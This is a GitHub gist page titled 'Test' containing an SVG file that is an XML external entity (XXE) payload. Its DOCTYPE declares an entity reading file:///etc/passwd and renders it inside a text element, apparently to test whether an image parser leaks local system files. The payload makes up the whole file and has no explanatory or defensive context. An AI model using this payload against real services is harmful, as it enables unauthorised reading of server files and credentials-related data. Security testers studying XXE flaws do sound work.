Skip to content

Instantly share code, notes, and snippets.

@svennergr
Last active July 21, 2022 10:26
Show Gist options
  • Save svennergr/e7ace129f7bf2d527cb297e7a04466bd to your computer and use it in GitHub Desktop.
Save svennergr/e7ace129f7bf2d527cb297e7a04466bd to your computer and use it in GitHub Desktop.
Test
Display the source blob
Display the rendered blob
Raw
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY foo SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<text font-family="Verdana" font-size="16" x="10" y="40">a</text>
<text font-family="Verdana" font-size="16" x="10" y="40">&foo;</text>
<text font-family="Verdana" font-size="16" x="10" y="40">b</text>
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment